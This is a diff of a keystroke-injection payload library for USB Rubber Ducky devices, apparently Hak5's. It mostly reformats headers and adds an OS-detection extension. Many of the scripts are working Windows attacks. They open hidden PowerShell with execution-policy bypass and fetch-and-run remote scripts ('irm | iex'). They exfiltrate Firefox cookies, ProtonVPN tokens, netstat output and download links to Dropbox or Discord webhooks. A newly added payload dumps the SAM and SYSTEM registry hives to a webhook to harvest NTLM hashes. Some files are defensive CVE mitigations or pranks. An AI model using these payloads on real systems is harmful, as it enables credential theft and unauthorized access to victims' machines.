WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
STRINGLN powershell
DELAY 2000
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
END_STRINGLN
$accessToken = #DROPBOX_ACCESS_TOKEN
REM Setting about exfiltration
STRING $accessToken =
STRING DROPBOX_ACCESS_TOKEN
ENTER
STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"

66
payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
View File

@ -1,26 +1,68 @@
REM ####################################################################
REM # |
REM # Title : Export all saved certificates with Adobe Reader |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################
REM_BLOCK
####################################################################
# #
# Title : Export all saved certificates with Adobe Reader #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
####################################################################
END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRING PowerShell
STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader

71
payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
View File

@ -1,20 +1,63 @@
REM ###########################################################
REM # |
REM # Title : Exports all the links of the downloads |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################
REM_BLOCK
###########################################################
# #
# Title : Exports all the links of the downloads #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10/11 #
# #
###########################################################
END_REM
REM Requirements:
REM - Firefox installed
REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE DISCORD_WEBHOOK example
DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Firefox
GUI
@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
STRING $WebhookUrl = "
STRING DISCORD_WEBHOOK
STRINGLN "
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json

112
payloads/library/exfiltration/ProtonVPN-config/payload.txt
View File

@ -1,43 +1,83 @@
REM ###################################################################
REM # |
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM_BLOCK
###################################################################
# #
# Title : ProtonVPN-config-to-Discord-Exfiltration #
# Author : Aleff #
# Version : 1.0 #
# Category : Credentials, Exfiltration #
# Target : Windows 10-11 #
# #
###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection
REM
Title: ProtonVPN-config-to-Discord-Exfiltration
Author: Aleff
Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
In the config file you can find a lot information about the user like:
- UserUid
- UserAccessToken
- UserRefreshToken
- UserAuthenticationPublicKey
- UserAuthenticationSecretKey
- UserAuthenticationCertificatePem
- UserCertificationServerPublicKey
- and so on...
Then it cleans up traces of what you have done after.
Target: Windows 10-11 (PowerShell + ProtonVPN software)
Version: 1.0
Category: Credentials, Exfiltration
Requirements: ProtonVPN user logged at least one time and internet connection
END_REM
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DEFINE #WEBHOOK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex

10
payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
View File

@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>Linkedin
</td>
</tr>
</table>
</div>
</div>

20
payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
View File

@ -1,12 +1,14 @@
REM ###########################################################
REM # |
REM # Title : Tree Structure Of The Operating System |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################################
REM_BLOCK
###########################################################
# #
# Title : Tree Structure Of The Operating System #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
###########################################################
END_REM
REM Requirements:
REM - Internet connection

113
payloads/library/exfiltration/Windows-netstat/payload.txt
View File

@ -1,45 +1,84 @@
REM ###################################################################
REM # |
REM # Title : Windows-netstat-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Net, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM_BLOCK
###################################################################
# #
# Title : Windows-netstat-to-Discord-Exfiltration #
# Author : Aleff #
# Version : 1.0 #
# Category : Net, Exfiltration #
# Target : Windows 10-11 #
# #
###################################################################
REM Title: Windows-netstat-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command)
REM - routing_table $r
REM - listening_canonical $lc
REM - listening_numerical $ln
REM - all_canonical $ac
REM - all_numerical $an
REM - offload ot
REM - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
Title: Windows-netstat-to-Discord-Exfiltration
Author: Aleff
Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Put 1 on the function that you want to active, else 0. Functions available:
- default (simple 'netstat' command)
- routing_table $r
- listening_canonical $lc
- listening_numerical $ln
- all_canonical $ac
- all_numerical $an
- offload ot
- proto $p "<protocol>"
- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Target: Windows 10-11 (PowerShell)
REM Version: 1.0
REM Category: Net, Exfiltration
REM Requirements: Internet connection
REM
Target: Windows 10-11 (PowerShell)
Version: 1.0
Category: Net, Exfiltration
Requirements: Internet connection
END_REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE #WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex

28
payloads/library/exfiltration/ntlm_exfiltration/README.md Normal file
View File

@ -0,0 +1,28 @@
# Exfiltrate NTLM Hash - Windows ✅
A script used to exfiltrate the NTLM hash on a Windows machine.
## Description
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
### Settings
* Set the Discord webhook URL
* Ensure the webhook permissions are configured
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

34
payloads/library/exfiltration/ntlm_exfiltration/payload.txt Normal file
View File

@ -0,0 +1,34 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
GUI d
DELAY 1000
GUI r
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
DELAY 500
GUI d

39
payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
View File

@ -1,13 +1,14 @@
REM #############################################################################################
REM # #
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Cisco IOS XE #
REM # #
REM #############################################################################################
REM_BLOCK
#############################################################################################
# #
# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Cisco IOS XE #
# #
#############################################################################################
END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
REM To avoid some bad DELAY I decided to use only one command row
REM Old script
REM STRINGLN sudo chmod +x #SCRIPT-NAME
REM DELAY 500
REM STRINGLN #SUDO-PSWD
REM DELAY 3000
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
REM STRINGLN exit
REM_BLOCK
Old script:
STRINGLN sudo chmod +x #SCRIPT-NAME
DELAY 500
STRINGLN #SUDO-PSWD
DELAY 3000
STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
STRINGLN exit
END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit

87
payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
View File

@ -1,34 +1,79 @@
REM #######################################################################################################################
REM # |
REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Incident Response |
REM # Target : Windows 10/11 |
REM # |
REM #######################################################################################################################
REM_BLOCK
#######################################################################################################################
# #
# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
# Author : Aleff #
# Version : 1.0 #
# Category : Incident Response #
# Target : Windows 10/11 #
# #
#######################################################################################################################
REM PlugAndPlay <3
PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
Requirements:
- ExecutionPolicy Bypass
REM Impact: Remote Code Execution
REM Max Severity: Important
Impact: Remote Code Execution
Max Severity: Important
REM Mitigation:
Mitigation:
REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
- Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
- The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI x
DELAY 500
STRING a

38
payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
View File

@ -1,25 +1,27 @@
REM ########################################################
REM # |
REM # Title : Defend Yourself From CVE-2023-23397 |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Incident-Response |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Defend Yourself From CVE-2023-23397 #
# Author : Aleff #
# Version : 1.0 #
# Category : Incident-Response #
# Target : Windows 10/11 #
# #
########################################################
REM PlugAndPlay <3
PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
REM - PayloadStudio 1.3.1
Requirements:
- ExecutionPolicy Bypass
- PayloadStudio 1.3.1
REM Impacted Products:
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
Impacted Products:
- All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
REM Mitigation:
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
Mitigation:
- Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1

20
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
View File

@ -1,12 +1,14 @@
REM ################################################################################
REM # #
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : incident-response #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM # #
REM ################################################################################
REM_BLOCK
################################################################################
# #
# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
# Author : Aleff #
# Version : 1.0 #
# Category : incident-response #
# Target : Citrix NetScaler ADV; NetScaler Gateway #
# #
################################################################################
END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example

82
payloads/library/prank/Alien Message From Computer/payload.txt
View File

@ -1,39 +1,79 @@
REM_BLOCK
####################################################
# #
# Title : Alien Message From Computer #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################################
REM ####################################################
REM # |
REM # Title : Alien Message From Computer |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
Plug-And-Play <3
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Plug-And-Play <3
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 1500
REM Create the file
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
ENTER
STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000

84
payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
View File

@ -1,36 +1,72 @@
REM ######################################################
REM # |
REM # Title : Change Wallpaper With Screenshot |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM_BLOCK
######################################################
# #
# Title : Change Wallpaper With Screenshot #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
######################################################
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
